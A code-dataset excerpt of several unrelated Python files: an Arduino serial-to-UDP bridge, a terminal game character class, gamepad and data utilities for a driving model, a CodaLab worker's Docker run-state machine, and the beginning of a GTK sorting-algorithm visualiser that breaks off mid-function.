source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
SerialUDPBridge.py
|
import serial #Serial port API http://pyserial.sourceforge.net/pyserial_api.html
import socket
import time
from threading import Thread
def recvUDP(sock,SerialIOArduino):
while True:
data, addr = sock.recvfrom(1280) # Max recieve size is 1280 bytes
print "UDP received message:", data.strip()
SerialIOArduino.write(data)
port = "/dev/ttyACM0"
UDP_IP = "127.0.0.1"
UDP_PORT = 9050
print "UDP target IP:", UDP_IP
print "UDP target port:", UDP_PORT
sock = socket.socket(socket.AF_INET, # Internet protocol
socket.SOCK_DGRAM) # User Datagram (UDP)
sock.bind(("0.0.0.0", UDP_PORT)) # Listen on all adapters
SerialIOArduino = serial.Serial(port,9600) # setup the serial port and baudrate
SerialIOArduino.flushInput() # Remove old input's
t = Thread(target=recvUDP,args=(sock,SerialIOArduino,))
t.daemon=True # Stop thread when program ends
t.start()
while True:
if (SerialIOArduino.inWaiting() > 0):
inputLine = SerialIOArduino.readline().strip() # read a '\n' terminated line()
# Send the csv string as a UDP message
sock.sendto(inputLine, (UDP_IP, UDP_PORT))
|
character.py
|
from collections import deque
from threading import Thread
from blessed import Terminal
from pynput.keyboard import Key, Listener
from .abstractdungeonentity import AbstractDungeonEntity
term = Terminal()
class Character(AbstractDungeonEntity):
"""This describes a character"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.ENTITY_TYPE = "character"
self.playing = True
self.commands = deque()
self.health = 100
def press(self, key: Key) -> None:
"""Reads keyboard input"""
self.new_positions = {"x": 0, "y": 0}
try:
if key.char == 'a':
self.new_positions["x"] = -1
if key.char == 'd':
self.new_positions["x"] = 1
if key.char == 'w':
self.new_positions["y"] = -1
if key.char == 's':
self.new_positions["y"] = 1
except AttributeError:
self.playing = False
def release(self, key: Key) -> bool:
"""On key release"""
try:
if key.char == 'p':
self.playing = False
except AttributeError:
pass
return False
def keyboard_input(self) -> None:
"""Uses listener that reads keyboard input from press"""
with Listener(on_press=self.press, on_release=self.release) as listener: # set keys to be read immediately
listener.join()
def move(self, direction: str) -> None:
"""Move player"""
if direction == 'a':
self.new_positions["x"] = -1
if direction == 'd':
self.new_positions["x"] = 1
if direction == 'w':
self.new_positions["y"] = -1
if direction == 's':
self.new_positions["y"] = 1
if direction == 'p':
self.playing = False
def start(self) -> None:
"""Start thread"""
Thread(target=self.control, args=()).start()
def control(self) -> None:
"""Get keyboard controls"""
while self.playing:
with term.cbreak(): # set keys to be read immediately
inp = term.inkey() # wait and read one character
self.commands.append(inp)
def update(self) -> None:
"""Turn based update"""
command = ""
while len(command) == 0:
if len(self.commands) > 0:
command = (self.commands.pop())
self.move(command)
|
utils.py
|
#!/usr/bin/env python
import sys
import array
import numpy as np
from skimage.color import rgb2gray
from skimage.transform import resize
from skimage.io import imread
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from inputs import get_gamepad
import math
import threading
def resize_image(img):
im = resize(img, (Sample.IMG_H, Sample.IMG_W, Sample.IMG_D))
im_arr = im.reshape((Sample.IMG_H, Sample.IMG_W, Sample.IMG_D))
return im_arr
class Screenshot(object):
# PS Remote Play = (0,40,960,560)
# Emulator = (0,60,640,480)
SRC_W = 960
SRC_H = 560
SRC_D = 3
OFFSET_X = 0
OFFSET_Y = 40
class Sample:
IMG_W = 200
IMG_H = 66
IMG_D = 3
class Controller(object):
MAX_TRIG_VAL = math.pow(2, 8)
MAX_JOY_VAL = math.pow(2, 15)
def __init__(self):
self.LeftJoystickY = 0
self.LeftJoystickX = 0
self.RightJoystickY = 0
self.RightJoystickX = 0
self.LeftTrigger = 0
self.RightTrigger = 0
self.LeftBumper = 0
self.RightBumper = 0
self.A = 0
self.X = 0
self.Y = 0
self.B = 0
self.LeftThumb = 0
self.RightThumb = 0
self.Back = 0
self.Start = 0
self.LeftDPad = 0
self.RightDPad = 0
self.UpDPad = 0
self.DownDPad = 0
self._monitor_thread = threading.Thread(target=self.monitor_controller, args=())
self._monitor_thread.daemon = True
self._monitor_thread.start()
# def read(self):
# x = self.LeftJoystickX
# y = self.LeftJoystickY
# a = self.A
# b = self.X # b=1, x=2
# rb = self.RightBumper
# return [x, y, a, b, rb]
# GTA/Need for Speed
def read(self):
x = self.LeftJoystickX
r = self.RightTrigger
l = self.LeftTrigger
a = self.A
b = self.Y
return [x, r, l, a, b]
def monitor_controller(self):
while True:
events = get_gamepad()
for event in events:
if event.code == 'ABS_Y':
self.LeftJoystickY = event.state / Controller.MAX_JOY_VAL # normalize between -1 and 1
elif event.code == 'ABS_X':
self.LeftJoystickX = event.state / Controller.MAX_JOY_VAL # normalize between -1 and 1
elif event.code == 'ABS_RY':
self.RightJoystickY = event.state / Controller.MAX_JOY_VAL # normalize between -1 and 1
elif event.code == 'ABS_RX':
self.RightJoystickX = event.state / Controller.MAX_JOY_VAL # normalize between -1 and 1
elif event.code == 'ABS_Z':
self.LeftTrigger = event.state / Controller.MAX_TRIG_VAL # normalize between 0 and 1
elif event.code == 'ABS_RZ':
self.RightTrigger = event.state / Controller.MAX_TRIG_VAL # normalize between 0 and 1
elif event.code == 'BTN_TL':
self.LeftBumper = event.state
elif event.code == 'BTN_TR':
self.RightBumper = event.state
elif event.code == 'BTN_SOUTH':
self.A = event.state
elif event.code == 'BTN_NORTH':
self.X = event.state
elif event.code == 'BTN_WEST':
self.Y = event.state
elif event.code == 'BTN_EAST':
self.B = event.state
elif event.code == 'BTN_THUMBL':
self.LeftThumb = event.state
elif event.code == 'BTN_THUMBR':
self.RightThumb = event.state
elif event.code == 'BTN_SELECT':
self.Back = event.state
elif event.code == 'BTN_START':
self.Start = event.state
elif event.code == 'BTN_TRIGGER_HAPPY1':
self.LeftDPad = event.state
elif event.code == 'BTN_TRIGGER_HAPPY2':
self.RightDPad = event.state
elif event.code == 'BTN_TRIGGER_HAPPY3':
self.UpDPad = event.state
elif event.code == 'BTN_TRIGGER_HAPPY4':
self.DownDPad = event.state
class Data(object):
def __init__(self):
self._X = np.load("data/X.npy")
self._y = np.load("data/y.npy")
self._epochs_completed = 0
self._index_in_epoch = 0
self._num_examples = self._X.shape[0]
@property
def num_examples(self):
return self._num_examples
def next_batch(self, batch_size):
start = self._index_in_epoch
self._index_in_epoch += batch_size
if self._index_in_epoch > self._num_examples:
# Finished epoch
self._epochs_completed += 1
# Start next epoch
start = 0
self._index_in_epoch = batch_size
assert batch_size <= self._num_examples
end = self._index_in_epoch
return self._X[start:end], self._y[start:end]
def load_sample(sample):
image_files = np.loadtxt(sample + '/data.csv', delimiter=',', dtype=str, usecols=(0,))
joystick_values = np.loadtxt(sample + '/data.csv', delimiter=',', usecols=(1,2,3,4,5))
return image_files, joystick_values
# training data viewer
def viewer(sample):
image_files, joystick_values = load_sample(sample)
plotData = []
plt.ion()
plt.figure('viewer', figsize=(16, 6))
for i in range(len(image_files)):
# joystick
print(i, " ", joystick_values[i,:])
# format data
plotData.append( joystick_values[i,:] )
if len(plotData) > 30:
plotData.pop(0)
x = np.asarray(plotData)
# image (every 3rd)
if (i % 3 == 0):
plt.subplot(121)
image_file = image_files[i]
img = mpimg.imread(image_file)
plt.imshow(img)
# plot
plt.subplot(122)
plt.plot(range(i,i+len(plotData)), x[:,0], 'r')
# plt.hold(True)
plt.plot(range(i,i+len(plotData)), x[:,1], 'b')
plt.plot(range(i,i+len(plotData)), x[:,2], 'g')
plt.plot(range(i,i+len(plotData)), x[:,3], 'k')
plt.plot(range(i,i+len(plotData)), x[:,4], 'y')
plt.draw()
# plt.hold(False)
plt.pause(0.0001) # seconds
i += 1
# prepare training data
def prepare(samples):
print("Preparing data")
X = []
y = []
for sample in samples:
print(sample)
# load sample
image_files, joystick_values = load_sample(sample)
# add joystick values to y
y.append(joystick_values)
# load, prepare and add images to X
for image_file in image_files:
image = imread(image_file)
vec = resize_image(image)
X.append(vec)
print("Saving to file...")
X = np.asarray(X)
y = np.concatenate(y)
np.save("data/X", X)
np.save("data/y", y)
print("Done!")
return
if __name__ == '__main__':
if sys.argv[1] == 'viewer':
viewer(sys.argv[2])
elif sys.argv[1] == 'prepare':
prepare(sys.argv[2:])
|
worker_run_state.py
|
import docker
import glob
import logging
import os
import threading
import time
import traceback
import codalab.worker.docker_utils as docker_utils
from collections import namedtuple
from pathlib import Path
from codalab.lib.formatting import size_str, duration_str
from codalab.worker.file_util import remove_path, get_path_size, path_is_parent
from codalab.worker.bundle_state import State, DependencyKey
from codalab.worker.fsm import DependencyStage, StateTransitioner
from codalab.worker.worker_thread import ThreadDict
logger = logging.getLogger(__name__)
class RunStage(object):
"""
Defines the finite set of possible stages and transition functions
Note that it is important that each state be able to be re-executed
without unintended adverse effects (which happens upon worker resume)
"""
WORKER_STATE_TO_SERVER_STATE = {}
"""
This stage involves setting up the directory structure for the run
and preparing to start the container
"""
PREPARING = 'RUN_STAGE.PREPARING'
WORKER_STATE_TO_SERVER_STATE[PREPARING] = State.PREPARING
"""
Running encompasses the state where the user's job is running
"""
RUNNING = 'RUN_STAGE.RUNNING'
WORKER_STATE_TO_SERVER_STATE[RUNNING] = State.RUNNING
"""
This stage encompasses cleaning up intermediary components like
the dependency symlinks and also the releasing of dependencies
"""
CLEANING_UP = 'RUN_STAGE.CLEANING_UP'
WORKER_STATE_TO_SERVER_STATE[CLEANING_UP] = State.RUNNING
"""
Uploading results means the job's results are getting uploaded to the server
"""
UPLOADING_RESULTS = 'RUN_STAGE.UPLOADING_RESULTS'
WORKER_STATE_TO_SERVER_STATE[UPLOADING_RESULTS] = State.RUNNING
"""
Finalizing means the worker is finalizing the bundle metadata with the server
"""
FINALIZING = 'RUN_STAGE.FINALIZING'
WORKER_STATE_TO_SERVER_STATE[FINALIZING] = State.FINALIZING
"""
Finished means the worker is done with this run
"""
FINISHED = 'RUN_STAGE.FINISHED'
WORKER_STATE_TO_SERVER_STATE[FINISHED] = State.READY
"""
This stage will collect bundles in terminal states and
sent them back to the server with RESTAGED state
"""
RESTAGED = 'RUN_STAGE.RESTAGED'
WORKER_STATE_TO_SERVER_STATE[RESTAGED] = State.STAGED
RunState = namedtuple(
'RunState',
[
'stage', # RunStage
'run_status', # str
'bundle', # BundleInfo
'bundle_path', # str
'bundle_dir_wait_num_tries', # Optional[int]
'resources', # RunResources
'bundle_start_time', # int
'container_time_total', # int
'container_time_user', # int
'container_time_system', # int
'container', # Optional[docker.Container]
'container_id', # Optional[str]
'docker_image', # Optional[str]
'is_killed', # bool
'has_contents', # bool
'cpuset', # Optional[Set[str]]
'gpuset', # Optional[Set[str]]
'max_memory', # int
'disk_utilization', # int
'exitcode', # Optionall[str]
'failure_message', # Optional[str]
'kill_message', # Optional[str]
'finished', # bool
'finalized', # bool
'is_restaged', # bool
'cpu_usage', # float
'memory_limit', # int
],
)
"""Dependency that is mounted.
TODO(Ashwin): document this better
docker_path - path on the Docker container where the dependency is mounted
example (shared file system): /0x0fbb927dc0e54544bbc2d439a6805951/foo
example (non-shared file system): .../codalab-worksheets/var/codalab/worker/dependencies/0x6b5bfdca99b6423ea36327102b19d0af
child_path - path inside the bundle folder from where the dependency is mounted
example (shared file system): .../codalab-worksheets/var/codalab/home/partitions/default/bundles/0x0fbb927dc0e54544bbc2d439a6805951/foo
example (non-shared file system): .../codalab-worksheets/var/codalab/home/partitions/default/bundles/0x0fbb927dc0e54544bbc2d439a6805951/foo
parent_path - path of the dependency
example (shared file system): /opt/codalab-worksheets/tests/files/a.txt
example (non-shared file system): .../codalab-worksheets/var/codalab/worker/dependencies/0x6b5bfdca99b6423ea36327102b19d0af
"""
DependencyToMount = namedtuple('DependencyToMount', 'docker_path, child_path, parent_path')
class RunStateMachine(StateTransitioner):
"""
Manages the state machine of the runs running on the local machine
Note that in general there are two types of errors:
- User errors (fault of bundle) - we fail the bundle (move to CLEANING_UP state).
- System errors (fault of worker) - we freeze this worker (Exception is thrown up).
It's not always clear where the line is.
"""
_ROOT = '/'
_CURRENT_DIRECTORY = '.'
def __init__(
self,
docker_image_manager, # Component to request docker images from
dependency_manager, # Component to request dependency downloads from
worker_docker_network, # Docker network to add all bundles to
docker_network_internal, # Docker network to add non-net connected bundles to
docker_network_external, # Docker network to add internet connected bundles to
docker_runtime, # Docker runtime to use for containers (nvidia or runc)
upload_bundle_callback, # Function to call to upload bundle results to the server
assign_cpu_and_gpu_sets_fn, # Function to call to assign CPU and GPU resources to each run
shared_file_system, # If True, bundle mount is shared with server
):
super(RunStateMachine, self).__init__()
self.add_transition(RunStage.PREPARING, self._transition_from_PREPARING)
self.add_transition(RunStage.RUNNING, self._transition_from_RUNNING)
self.add_transition(RunStage.CLEANING_UP, self._transition_from_CLEANING_UP)
self.add_transition(RunStage.UPLOADING_RESULTS, self._transition_from_UPLOADING_RESULTS)
self.add_transition(RunStage.FINALIZING, self._transition_from_FINALIZING)
self.add_terminal(RunStage.FINISHED)
self.add_terminal(RunStage.RESTAGED)
self.dependency_manager = dependency_manager
self.docker_image_manager = docker_image_manager
self.worker_docker_network = worker_docker_network
self.docker_network_external = docker_network_external
self.docker_network_internal = docker_network_internal
self.docker_runtime = docker_runtime
# bundle.uuid -> {'thread': Thread, 'run_status': str}
self.uploading = ThreadDict(fields={'run_status': 'Upload started', 'success': False})
# bundle.uuid -> {'thread': Thread, 'disk_utilization': int, 'running': bool}
self.disk_utilization = ThreadDict(
fields={'disk_utilization': 0, 'running': True, 'lock': None}
)
self.upload_bundle_callback = upload_bundle_callback
self.assign_cpu_and_gpu_sets_fn = assign_cpu_and_gpu_sets_fn
self.shared_file_system = shared_file_system
self.paths_to_remove = []
def stop(self):
for uuid in self.disk_utilization.keys():
self.disk_utilization[uuid]['running'] = False
self.disk_utilization.stop()
self.uploading.stop()
def _transition_from_PREPARING(self, run_state):
"""
1- Request the docker image from docker image manager
- if image is failed, move to CLEANING_UP state
2- Request the dependencies from dependency manager
- if any are failed, move to CLEANING_UP state
3- If all dependencies and docker image are ready:
- Set up the local filesystem for the run
- Create symlinks to dependencies
- Allocate resources and prepare the docker container
- Start the docker container
4- If all is successful, move to RUNNING state
"""
def mount_dependency(dependency, shared_file_system):
if not shared_file_system:
# Set up symlinks for the content at dependency path
Path(dependency.child_path).parent.mkdir(parents=True, exist_ok=True)
os.symlink(dependency.docker_path, dependency.child_path)
# The following will be converted into a Docker volume binding like:
# dependency_path:docker_dependency_path:ro
docker_dependencies.append((dependency.parent_path, dependency.docker_path))
if run_state.is_killed or run_state.is_restaged:
return run_state._replace(stage=RunStage.CLEANING_UP)
# Check CPU and GPU availability
try:
cpuset, gpuset = self.assign_cpu_and_gpu_sets_fn(
run_state.resources.cpus, run_state.resources.gpus
)
except Exception as e:
message = "Unexpectedly unable to assign enough resources to bundle {}: {}".format(
run_state.bundle.uuid, str(e)
)
logger.error(message)
logger.error(traceback.format_exc())
return run_state._replace(run_status=message)
dependencies_ready = True
status_messages = []
if not self.shared_file_system:
# No need to download dependencies if we're in the shared FS,
# since they're already in our FS
for dep in run_state.bundle.dependencies:
dep_key = DependencyKey(dep.parent_uuid, dep.parent_path)
dependency_state = self.dependency_manager.get(run_state.bundle.uuid, dep_key)
if dependency_state.stage == DependencyStage.DOWNLOADING:
status_messages.append(
'Downloading dependency %s: %s done (archived size)'
% (dep.child_path, size_str(dependency_state.size_bytes))
)
dependencies_ready = False
elif dependency_state.stage == DependencyStage.FAILED:
# Failed to download dependency; -> CLEANING_UP
return run_state._replace(
stage=RunStage.CLEANING_UP,
failure_message='Failed to download dependency %s: %s'
% (dep.child_path, dependency_state.message),
)
# get the docker image
docker_image = run_state.resources.docker_image
image_state = self.docker_image_manager.get(docker_image)
if image_state.stage == DependencyStage.DOWNLOADING:
status_messages.append(
'Pulling docker image: ' + (image_state.message or docker_image or "")
)
dependencies_ready = False
elif image_state.stage == DependencyStage.FAILED:
# Failed to pull image; -> CLEANING_UP
message = 'Failed to download Docker image: %s' % image_state.message
logger.error(message)
return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=message)
# stop proceeding if dependency and image downloads aren't all done
if not dependencies_ready:
status_message = status_messages.pop()
if status_messages:
status_message += "(and downloading %d other dependencies and docker images)" % len(
status_messages
)
return run_state._replace(run_status=status_message)
# All dependencies ready! Set up directories, symlinks and container. Start container.
# 1) Set up a directory to store the bundle.
if self.shared_file_system:
if not os.path.exists(run_state.bundle_path):
if run_state.bundle_dir_wait_num_tries == 0:
message = (
"Bundle directory cannot be found on the shared filesystem. "
"Please ensure the shared fileystem between the server and "
"your worker is mounted properly or contact your administrators."
)
logger.error(message)
return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=message)
return run_state._replace(
run_status="Waiting for bundle directory to be created by the server",
bundle_dir_wait_num_tries=run_state.bundle_dir_wait_num_tries - 1,
)
else:
remove_path(run_state.bundle_path)
os.makedirs(run_state.bundle_path)
# 2) Set up symlinks
docker_dependencies = []
docker_dependencies_path = (
RunStateMachine._ROOT
+ run_state.bundle.uuid
+ ('_dependencies' if not self.shared_file_system else '')
)
for dep in run_state.bundle.dependencies:
full_child_path = os.path.normpath(os.path.join(run_state.bundle_path, dep.child_path))
to_mount = []
dependency_path = self._get_dependency_path(run_state, dep)
if dep.child_path == RunStateMachine._CURRENT_DIRECTORY:
# Mount all the content of the dependency_path to the top-level of the bundle
for child in os.listdir(dependency_path):
child_path = os.path.normpath(os.path.join(run_state.bundle_path, child))
to_mount.append(
DependencyToMount(
docker_path=os.path.join(docker_dependencies_path, child),
child_path=child_path,
parent_path=os.path.join(dependency_path, child),
)
)
self.paths_to_remove.append(child_path)
else:
to_mount.append(
DependencyToMount(
docker_path=os.path.join(docker_dependencies_path, dep.child_path),
child_path=full_child_path,
parent_path=dependency_path,
)
)
first_element_of_path = Path(dep.child_path).parts[0]
if first_element_of_path == RunStateMachine._ROOT:
self.paths_to_remove.append(full_child_path)
else:
# child_path can be a nested path, so later remove everything from the first element of the path
self.paths_to_remove.append(
os.path.join(run_state.bundle_path, first_element_of_path)
)
for dependency in to_mount:
try:
mount_dependency(dependency, self.shared_file_system)
except OSError as e:
return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=str(e))
if run_state.resources.network:
docker_network = self.docker_network_external.name
else:
docker_network = self.docker_network_internal.name
# 3) Start container
try:
container = docker_utils.start_bundle_container(
run_state.bundle_path,
run_state.bundle.uuid,
docker_dependencies,
run_state.bundle.command,
run_state.resources.docker_image,
network=docker_network,
cpuset=cpuset,
gpuset=gpuset,
memory_bytes=run_state.resources.memory,
runtime=self.docker_runtime,
)
self.worker_docker_network.connect(container)
except docker_utils.DockerUserErrorException as e:
message = 'Cannot start Docker container: {}'.format(e)
logger.warning(message)
return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=message)
except Exception as e:
message = 'Cannot start Docker container: {}'.format(e)
logger.error(message)
logger.error(traceback.format_exc())
raise
return run_state._replace(
stage=RunStage.RUNNING,
run_status='Running job in Docker container',
container_id=container.id,
container=container,
docker_image=image_state.digest,
has_contents=True,
cpuset=cpuset,
gpuset=gpuset,
)
def _get_dependency_path(self, run_state, dependency):
if self.shared_file_system:
# TODO(Ashwin): make this not fs-specific.
# On a shared FS, we know where the dependency is stored and can get the contents directly
return os.path.realpath(os.path.join(dependency.location, dependency.parent_path))
else:
# On a dependency_manager setup, ask the manager where the dependency is
dep_key = DependencyKey(dependency.parent_uuid, dependency.parent_path)
return os.path.join(
self.dependency_manager.dependencies_dir,
self.dependency_manager.get(run_state.bundle.uuid, dep_key).path,
)
def _transition_from_RUNNING(self, run_state):
"""
1- Check run status of the docker container
2- If run is killed, kill the container
3- If run is finished, move to CLEANING_UP state
"""
def check_and_report_finished(run_state):
try:
finished, exitcode, failure_msg = docker_utils.check_finished(run_state.container)
except docker_utils.DockerException:
logger.error(traceback.format_exc())
finished, exitcode, failure_msg = False, None, None
return run_state._replace(
finished=finished, exitcode=exitcode, failure_message=failure_msg
)
def check_resource_utilization(run_state: RunState):
cpu_usage, memory_limit = docker_utils.get_container_stats_with_docker_stats(
run_state.container
)
run_state = run_state._replace(cpu_usage=cpu_usage)
run_state = run_state._replace(memory_limit=memory_limit)
kill_messages = []
run_stats = docker_utils.get_container_stats(run_state.container)
run_state = run_state._replace(
max_memory=max(run_state.max_memory, run_stats.get('memory', 0))
)
run_state = run_state._replace(
disk_utilization=self.disk_utilization[run_state.bundle.uuid]['disk_utilization']
)
container_time_total = docker_utils.get_container_running_time(run_state.container)
run_state = run_state._replace(
container_time_total=container_time_total,
container_time_user=run_stats.get(
'container_time_user', run_state.container_time_user
),
container_time_system=run_stats.get(
'container_time_system', run_state.container_time_system
),
)
if run_state.resources.time and container_time_total > run_state.resources.time:
kill_messages.append(
'Time limit exceeded. (Container uptime %s > time limit %s)'
% (duration_str(container_time_total), duration_str(run_state.resources.time))
)
if run_state.max_memory > run_state.resources.memory or run_state.exitcode == 137:
kill_messages.append(
'Memory limit %s exceeded.' % size_str(run_state.resources.memory)
)
if run_state.resources.disk and run_state.disk_utilization > run_state.resources.disk:
kill_messages.append(
'Disk limit %sb exceeded.' % size_str(run_state.resources.disk)
)
if kill_messages:
run_state = run_state._replace(kill_message=' '.join(kill_messages), is_killed=True)
return run_state
def check_disk_utilization():
running = True
while running:
start_time = time.time()
try:
disk_utilization = get_path_size(run_state.bundle_path)
self.disk_utilization[run_state.bundle.uuid][
'disk_utilization'
] = disk_utilization
running = self.disk_utilization[run_state.bundle.uuid]['running']
except Exception:
logger.error(traceback.format_exc())
end_time = time.time()
# To ensure that we don't hammer the disk for this computation when
# there are lots of files, we run it at most 10% of the time.
time.sleep(max((end_time - start_time) * 10, 1.0))
self.disk_utilization.add_if_new(
run_state.bundle.uuid, threading.Thread(target=check_disk_utilization, args=[])
)
run_state = check_and_report_finished(run_state)
run_state = check_resource_utilization(run_state)
if run_state.is_killed or run_state.is_restaged:
if docker_utils.container_exists(run_state.container):
try:
run_state.container.kill()
except docker.errors.APIError:
finished, _, _ = docker_utils.check_finished(run_state.container)
if not finished:
logger.error(traceback.format_exc())
self.disk_utilization[run_state.bundle.uuid]['running'] = False
self.disk_utilization.remove(run_state.bundle.uuid)
return run_state._replace(stage=RunStage.CLEANING_UP)
if run_state.finished:
logger.debug(
'Finished run with UUID %s, exitcode %s, failure_message %s',
run_state.bundle.uuid,
run_state.exitcode,
run_state.failure_message,
)
self.disk_utilization[run_state.bundle.uuid]['running'] = False
self.disk_utilization.remove(run_state.bundle.uuid)
return run_state._replace(stage=RunStage.CLEANING_UP, run_status='Uploading results')
else:
return run_state
def _transition_from_CLEANING_UP(self, run_state):
"""
1- delete the container if still existent
2- clean up the dependencies from bundle directory
3- release the dependencies in dependency manager
4- If bundle has contents to upload (i.e. was RUNNING at some point),
move to UPLOADING_RESULTS state
Otherwise move to FINALIZING state
"""
def remove_path_no_fail(path):
try:
remove_path(path)
except Exception:
logger.error(traceback.format_exc())
if run_state.container_id is not None:
while docker_utils.container_exists(run_state.container):
try:
finished, _, _ = docker_utils.check_finished(run_state.container)
if finished:
run_state.container.remove(force=True)
run_state = run_state._replace(container=None, container_id=None)
break
else:
try:
run_state.container.kill()
except docker.errors.APIError:
logger.error(traceback.format_exc())
time.sleep(1)
except docker.errors.APIError:
logger.error(traceback.format_exc())
time.sleep(1)
for dep in run_state.bundle.dependencies:
if not self.shared_file_system: # No dependencies if shared fs worker
dep_key = DependencyKey(dep.parent_uuid, dep.parent_path)
self.dependency_manager.release(run_state.bundle.uuid, dep_key)
# Clean up dependencies paths
for path in self.paths_to_remove:
remove_path_no_fail(path)
self.paths_to_remove = []
if run_state.is_restaged:
return run_state._replace(stage=RunStage.RESTAGED)
if not self.shared_file_system and run_state.has_contents:
return run_state._replace(
stage=RunStage.UPLOADING_RESULTS, run_status='Uploading results', container=None
)
else:
# No need to upload results since results are directly written to bundle store
# Delete any files that match the exclude_patterns .
for exclude_pattern in run_state.bundle.metadata["exclude_patterns"]:
full_pattern = os.path.join(run_state.bundle_path, exclude_pattern)
for file_path in glob.glob(full_pattern, recursive=True):
# Only remove files that are subpaths of run_state.bundle_path, in case
# that exclude_pattern is something like "../../../".
if path_is_parent(parent_path=run_state.bundle_path, child_path=file_path):
remove_path(file_path)
return self.finalize_run(run_state)
def _transition_from_UPLOADING_RESULTS(self, run_state):
"""
If bundle not already uploading:
Use the RunManager API to upload contents at bundle_path to the server
Pass the callback to that API such that if the bundle is killed during the upload,
the callback returns false, allowing killable uploads.
If uploading and not finished:
Update run_status with upload progress
If uploading and finished:
Move to FINALIZING state
"""
if run_state.is_restaged:
return run_state._replace(stage=RunStage.RESTAGED)
def upload_results():
try:
# Upload results
logger.debug('Uploading results for run with UUID %s', run_state.bundle.uuid)
def progress_callback(bytes_uploaded):
run_status = 'Uploading results: %s done (archived size)' % size_str(
bytes_uploaded
)
self.uploading[run_state.bundle.uuid]['run_status'] = run_status
return True
self.upload_bundle_callback(
run_state.bundle.uuid,
run_state.bundle_path,
run_state.bundle.metadata["exclude_patterns"],
progress_callback,
)
self.uploading[run_state.bundle.uuid]['success'] = True
except Exception as e:
self.uploading[run_state.bundle.uuid]['run_status'] = (
"Error while uploading: %s" % e
)
logger.error(traceback.format_exc())
self.uploading.add_if_new(
run_state.bundle.uuid, threading.Thread(target=upload_results, args=[])
)
if self.uploading[run_state.bundle.uuid].is_alive():
return run_state._replace(
run_status=self.uploading[run_state.bundle.uuid]['run_status']
)
elif not self.uploading[run_state.bundle.uuid]['success']:
# upload failed
failure_message = run_state.failure_message
if failure_message:
run_state = run_state._replace(
failure_message=(
failure_message + '. ' + self.uploading[run_state.bundle.uuid]['run_status']
)
)
else:
run_state = run_state._replace(
failure_message=self.uploading[run_state.bundle.uuid]['run_status']
)
self.uploading.remove(run_state.bundle.uuid)
return self.finalize_run(run_state)
def finalize_run(self, run_state):
"""
Prepare the finalize message to be sent with the next checkin
"""
if run_state.is_killed:
# Append kill_message, which contains more useful info on why a run was killed, to the failure message.
failure_message = (
"{}. {}".format(run_state.failure_message, run_state.kill_message)
if run_state.failure_message
else run_state.kill_message
)
run_state = run_state._replace(failure_message=failure_message)
return run_state._replace(stage=RunStage.FINALIZING, run_status="Finalizing bundle")
def _transition_from_FINALIZING(self, run_state):
"""
If a full worker cycle has passed since we got into the FINALIZING state we already reported to
server, if bundle is going be sent back to the server, move on to the RESTAGED state. Otherwise,
move on to the FINISHED state. Can also remove bundle_path now.
"""
if run_state.is_restaged:
return run_state._replace(stage=RunStage.RESTAGED)
elif run_state.finalized:
if not self.shared_file_system:
remove_path(run_state.bundle_path) # don't remove bundle if shared FS
return run_state._replace(stage=RunStage.FINISHED, run_status='Finished')
else:
return run_state
|
gui.py
|
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk
from algorithms import *
import threading
algsSwitcher = {
0: bubblesort,
1: countingsort,
2: insertionsort,
3: radixsort,
4: quicksort,
5: bogosort
}
listToSort = []
# 0. speed, 1. change count, 2. thread stopping event, 3. who's setting the event?
# (True = refrBtn, False = algsCombo), 4. digit for bubble and countingsort single-digit
# mode (used for radixsort, 0 = off) 5. radix sort subroutine, 6. bar order
# (True = descending, False = random)
addl = [60, 0, threading.Event(), False, 0, countingsort, False]
sortingThread = threading.Thread()
class Application(Gtk.Application):
def __init__(self):
Gtk.Application.__init__(self, application_id="io.github.furtarball.gtk-sortvis")
self.handlers = {
"onStartClick": self.start_on_click,
"onRefrClick": self.refr_on_click,
"onAlgSwitch": self.algs_on_change,
"onConfigure": self.on_configure, # on window size change
"onDraw": self.on_draw,
"onToggle": self.on_setting_change
}
self.builder = Gtk.Builder.new_from_file("sortwindow.ui")
def do_activate(self):
self.window = self.builder.get_object("sortWindow")
self.startBtn = self.builder.get_object("startBtn")
self.refrBtn = self.builder.get_object("refrBtn")
self.algsCombo = self.builder.get_object("algsCombo")
self.barWidthSBtn = self.builder.get_object("barWidthSBtn")
self.gapsToggle = self.builder.get_object("gapsToggle")
self.fillToggle = self.builder.get_object("fillToggle")
self.speedSBtn = self.builder.get_object("speedSBtn")
self.barOrderToggle = self.builder.get_object("barOrderToggle")
self.rsSubrtToggle = self.builder.get_object("rsSubrtToggle")
self.mainDArea = self.builder.get_object("mainDArea")
self.barCountLbl = self.builder.get_object("barCountLbl")
self.changesMadeLbl = self.builder.get_object("changesMadeLbl")
self.barWidthSBtn.set_range(1, 200)
self.barWidthSBtn.set_value(9)
self.barWidthSBtn.set_increments(1, -1)
self.speedSBtn.set_range(10, 18000)
self.speedSBtn.set_value(60)
self.speedSBtn.set_increments(10, -10)
self.window.set_application(self)
self.window.show_all()
self.generate_heights()
self.rsSubrtToggle.hide()
self.builder.connect_signals(self.handlers)
def generate_heights(self):
global listToSort
listToSort = generate_list(self.mainDArea.get_allocation().height, round(self.mainDArea.get_allocation().width / (self.barWidthSBtn.get_value() + self.gapsToggle.get_active())), addl[6])
self.barCountLbl.set_label("Bars on screen: " + str(len(listToSort)))
self.prevSize = [self.mainDArea.get_allocation().width, self.mainDArea.get_allocation().height]
self.mainDArea.queue_draw()
def on_configure(self, widget, event):
wdiff = abs(self.mainDArea.get_allocation().width - self.prevSize[0])
hdiff = abs(self.mainDArea.get_allocation().height - self.prevSize[1])
margin = self.barWidthSBtn.get_value() + self.gapsToggle.get_active()
if ((wdiff >= margin) or (hdiff >= margin)) and not sortingThread.is_alive():
self.generate_heights()
def on_draw(self, widget, cairoContext):
nf = (not self.fillToggle.get_active())
bw = self.barWidthSBtn.get_value()
baseMargin = self.mainDArea.get_allocation().width / 2 - (len(listToSort) * (bw + self.gapsToggle.get_active())) / 2
cairoContext.set_source_rgb(0.6, 0.6, 0.6)
cairoContext.set_line_width(1)
cairoContext.set_antialias(1) # this stops one pixel wide bars from looking blurry
for i in range(len(listToSort)):
# left margin, top margin, width, height
